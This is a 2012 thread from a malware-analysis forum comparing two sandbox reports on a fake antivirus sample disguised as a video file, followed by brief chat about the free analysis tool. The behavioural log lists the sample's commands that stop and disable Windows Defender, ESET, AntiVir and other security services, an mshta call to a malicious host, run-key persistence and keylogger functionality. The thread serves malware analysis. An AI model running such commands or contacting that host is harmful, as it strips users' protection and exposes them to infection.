A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #14114  by Win32:Virut
 Wed Jun 20, 2012 10:21 am
Windows Proactive Safety

MD5: 3313bbc5ffd642dd82495ddd07091996

https://www.virustotal.com/file/3313bbc ... /analysis/
Hello,

Thanks for taking the time to submit your samples to the Norman
Sandbox Information Center. Customer delight is our top priority at
Norman. With that in mind we have developed Sandbox Solutions for
organizations that are committed to speedy analysis and debugging.

Norman Sandbox Solutions give your organization the opportunity to
analyze files immediately in your own environment.

To find out how to bring the power of Norman Sandbox into your test
environments follow the links below.

Norman Sandbox Solutions
http://www.norman.com/enterprise/all_bu ... analyzers/

Norman Sandbox Analyzer
http://www.norman.com/enterprise/all_pr ... _analyzer/

Norman Sandbox Analyzer Pro
http://www.norman.com/enterprise/all_pr ... lyzer_pro/

Norman SandBox Reporter
http://www.norman.com/enterprise/all_pr ... _reporter/

BDSM_Movie_214.mpeg.exe : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
* Filename: C:\analyzer\scan\BDSM_Movie_214.mpeg.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.

[ General information ]
* File length: 2398208 bytes.
* MD5 hash: 3313bbc5ffd642dd82495ddd07091996.
* SHA1 hash: 733d99ba11a0c7389c99d0f342e83f341c786460.
* Packer detection: ASProtect 1.33/2.1 Registered.

[ Changes to registry ]
* Accesses Registry key "HKCU\Software\Borland\Locales".
* Accesses Registry key "HKCU\Software\Borland\Delphi\Locales".
* Accesses Registry key "HKCU\Software\CodeGear\Locales".
* Accesses Registry key "HKLM\Software\CodeGear\Locales".
* Accesses Registry key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes".

[ Changes to system settings ]
* Creates WindowsHook monitoring call windows procedures activity.

[ Process/window information ]
* Creates an unnamed event.
* Creates a window with caption and classname TPUtilWindow.
* Creates a window with caption sample and classname TApplication.
* Creates section "SAMPLE.EXE" with full access to everyone.
* Attempts to open CLSID {1e651cc0-b199-11d0-8212- c04fc32c45}.



(C) 2004-2011 Norman ASA. All Rights Reserved.

The material presented is distributed by Norman ASA as an information source only.

This file is not flagged as malicious by the Norman Sandbox Information Center. However, we can not guarantee that the file is harmless. If you still suspect the file to be malicious and if you urgently need to know for sure, please submit it to your local Norman support department for manual analysis.


************************************
Sent from an unmonitored email address.
Please DO NOT reply.
************************************
Attachments
Password: infected
(2 MiB) Downloaded 78 times
 #14116  by Buster_BSA
 Wed Jun 20, 2012 12:23 pm
ReviewsAntivirus wrote:Thanks for taking the time to submit your samples to the Norman
Sandbox Information Center.
That´s the analysis you get with a malware analyzer being +10,000 euros license/year worth.

Now the analysis you get with the free Buster Sandbox Analyzer:

REPORT.TXT:
Report generated with Buster Sandbox Analyzer 1.70 at 14:12:36 on 20/06/2012

[ General information ]
* File name: c:\m\test\bdsm_movie_214.mpeg.exe.exe
* File length: 2398208 bytes
* File signature (PEiD): ASProtect 1.33 - 2.1 Registered -> Alexey Solodovnikov *
* File signature (Exeinfo): ASprotect ver 2.1 / 2.^ ( www.aspack.com ) - ! Correct version detect only : ASPrINFO v 1.6 Beta 100% detector by nik0g0r 2oo7
* File type: EXE
* TLS hooks: YES
* File entropy: 7.81432 (97.6791%)
* Adobe Malware Classifier: Unknown
* MD5 hash: 3313bbc5ffd642dd82495ddd07091996
* SHA1 hash: 733d99ba11a0c7389c99d0f342e83f341c786460
* SHA256 hash: a47d807e21cb13f0cfd0d28034151f90f600edb62c172659641ea2023b6be021

[ Changes to filesystem ]
* Deletes file C:\M\TEST\BDSM_Movie_214.mpeg.exe.EXE
* Creates file C:\Documents and Settings\Buster\Datos de programa\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#local\settings.sol
File length: 102 bytes
File type: Unknown
MD5 hash: 8548ac8f2a90dfeaa7ac7e24ba675533
SHA1 hash: 5eb7cca867cfc1c21e20ef9b1c969a06a4a63ebf
SHA256 hash: 5d8d98d9c9444f5acd810e083430cb45d4ec66e9afffa99ab651603156c172fd
* Creates file C:\Documents and Settings\Buster\Datos de programa\Protector-fqfp.exe
File length: 2398208 bytes
File type: EXE
File entropy: 7.81432 (97.6791%)
Adobe Malware Classifier: Unknown
MD5 hash: 3313bbc5ffd642dd82495ddd07091996
SHA1 hash: 733d99ba11a0c7389c99d0f342e83f341c786460
SHA256 hash: a47d807e21cb13f0cfd0d28034151f90f600edb62c172659641ea2023b6be021

[ Changes to registry ]
* Creates value "FEATURE=ftware\microsoft\Internet Explorer\Main\FeatureControl\FEATURE" in key HKEY_LOCAL_MACHINE\software\microsoft\Internet Explorer\Main\FeatureControl
* Modifies value "SavedLegacySettings=3C000000570700000100000000000000000000000000000004000000000000004029829C4F33CB0101000000C0A800040000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "SavedLegacySettings=3C000000550700000100000000000000000000000000000004000000000000004029829C4F33CB0101000000C0A800040000000000000000"
* Creates value "Inspector=C:\Documents and Settings\Buster\Datos de programa\Protector-fqfp.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
* Creates value "ID=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
* Creates value "UID=bfrmlhcojk" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
* Creates value "GConfig=DC070600030014000E000C00260026020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
* Creates value "net=2012-6-20_5" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings

[ Network services ]
* Looks for an Internet connection.
* Connects to "galaint.likestatinfo.in" on port 80.
* Connects to "showrealip.info" on port 80.
* Connects to "www.cmyip.com" on port 80.

[ Process/window/string information ]
* Keylogger functionality.
* Enables process privileges.
* Gets user name information.
* Gets system default language ID.
* Gets volume information.
* Gets computer name.
* Checks for debuggers.
* Creates a mutex "AMResourceMutex2".
* Creates a mutex "VideoRenderer".
* Creates a mutex "iSoftwere".
* Creates process "(null),C:\Documents and Settings\Buster\Datos de programa\Protector-fqfp.exe,(null)".
* Creates process "C:\WINDOWS\system32\cmd.exe,"C:\WINDOWS\system32\cmd.exe" /c del "C:\M\TEST\BDSM_M~1.EXE" >> NUL ,C:\M\TEST".
* Creates process "(null),mshta.exe "http://galaint.likestatinfo.in/?0=136&1 ... =0",(null)".
* Creates a mutex "{1B655094-FE2A-433c-A877-FF9793445069}".
* Creates a mutex "MidiMapper_modLongMessage_RefCnt".
* Creates a mutex "MidiMapper_Configure".
* Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003".
* Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003".
* Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003".
* Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003".
* Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003".
* Lists all entry names in a remote access phone book.
* Starts a service.
* Creates process "(null),sc stop WinDefend,(null)".
* Creates process "(null),sc config WinDefend start= disabled,(null)".
* Creates process "(null),sc stop msmpsvc,(null)".
* Creates process "(null),sc config msmpsvc start= disabled,(null)".
* Opens a service named "WinDefend".
* Creates process "(null),sc config ekrn start= disabled,(null)".
* Creates process "(null),sc stop AntiVirService,(null)".
* Opens a service named "msmpsvc".
* Creates process "(null),sc config AntiVirService start= disabled,(null)".
* Creates process "(null),sc config AntiVirSchedulerService start= disabled,(null)".
* Creates process "(null),sc stop GuardX,(null)".
* Opens a service named "ekrn".
* Creates process "(null),sc config GuardX start= disabled,(null)".
* Opens a service named "AntiVirService".
* Opens a service named "AntiVirSchedulerService".
* Opens a service named "GuardX".
* Opens a service named "Alerter".
* Opens a service named "LanmanWorkstation".
ANALYSIS.TXT:
Report generated with Buster Sandbox Analyzer 1.70 at 14:12:36 on 20/06/2012

Detailed report of suspicious malware actions:

Checked for debuggers
Contain TLS hooks
Created a mutex named: {1B655094-FE2A-433c-A877-FF9793445069}
Created a mutex named: AMResourceMutex2
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1060284298-261478967-1417001333-1003
Created a mutex named: iSoftwere
Created a mutex named: MidiMapper_Configure
Created a mutex named: MidiMapper_modLongMessage_RefCnt
Created a mutex named: VideoRenderer
Created file in defined folder: C:\Documents and Settings\Buster\Datos de programa\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#local\settings.sol
Created process: (null),C:\Documents and Settings\Buster\Datos de programa\Protector-fqfp.exe,(null)
Created process: (null),mshta.exe "http://galaint.likestatinfo.in/?0=136&1 ... =0",(null)
Created process: (null),sc config AntiVirSchedulerService start= disabled,(null)
Created process: (null),sc config AntiVirService start= disabled,(null)
Created process: (null),sc config ekrn start= disabled,(null)
Created process: (null),sc config GuardX start= disabled,(null)
Created process: (null),sc config msmpsvc start= disabled,(null)
Created process: (null),sc config WinDefend start= disabled,(null)
Created process: (null),sc stop AntiVirService,(null)
Created process: (null),sc stop GuardX,(null)
Created process: (null),sc stop msmpsvc,(null)
Created process: (null),sc stop WinDefend,(null)
Created process: C:\WINDOWS\system32\cmd.exe,"C:\WINDOWS\system32\cmd.exe" /c del "C:\M\TEST\BDSM_M~1.EXE" >> NUL ,C:\M\TEST
Defined file type created: C:\Documents and Settings\Buster\Datos de programa\Protector-fqfp.exe
Defined Log_API entry: Change to Microsoft Protection Service
Defined Log_API entry: Change to Windows Defender Service
Detected process privilege elevation
Disabled protection software: AntiVir
Disabled protection software: ESET
Disabled protection software: IKARUS
Disabled protection software: Microsoft Protection System
Disabled protection software: Windows Defender
File copied itself
File deleted itself
Got computer name
Got system default language ID
Got user name information
Got volume information
IE settings change: machine\software\microsoft\internet explorer\main\featurecontrol\feature
Internet connection: Connects to "galaint.likestatinfo.in" on port 80.
Internet connection: Connects to "showrealip.info" on port 80.
Internet connection: Connects to "www.cmyip.com" on port 80.
Listed all entry names in a remote access phone book
Opened a service named: Alerter
Opened a service named: AntiVirSchedulerService
Opened a service named: AntiVirService
Opened a service named: ekrn
Opened a service named: GuardX
Opened a service named: LanmanWorkstation
Opened a service named: msmpsvc
Opened a service named: WinDefend
Started a service

Risk evaluation result: High
 #14117  by rkhunter
 Wed Jun 20, 2012 1:00 pm
Buster_BSA wrote:That´s the analysis you get with a malware analyzer being +10,000 euros license/year worth.
Now the analysis you get with the free Buster Sandbox Analyzer:
He-he, some people don't believe that [you] not extract money profit from your tool. They see only material interests in work in any case :( .
 #14118  by Buster_BSA
 Wed Jun 20, 2012 1:15 pm
rkhunter wrote:He-he, some people don't believe that [you] not extract money profit from your tool. They see only material interests in work in any case :( .
What people is it and what reasons they have to believe I extract money profit from the tool?
 #14119  by rkhunter
 Wed Jun 20, 2012 1:26 pm
Buster_BSA wrote:What people is it and what reasons they have to believe I extract money profit from the tool?
In abstract, not to your side...some don't believe in tools for research purposes, only for money.
 #14123  by Buster_BSA
 Wed Jun 20, 2012 2:42 pm
rkhunter wrote:
Buster_BSA wrote:What people is it and what reasons they have to believe I extract money profit from the tool?
In abstract, not to your side...some don't believe in tools for research purposes, only for money.
In this case was not even for research purposes, it was just for the fun and the joy of doing it.
  • 1
  • 22
  • 23
  • 24
  • 25
  • 26
  • 46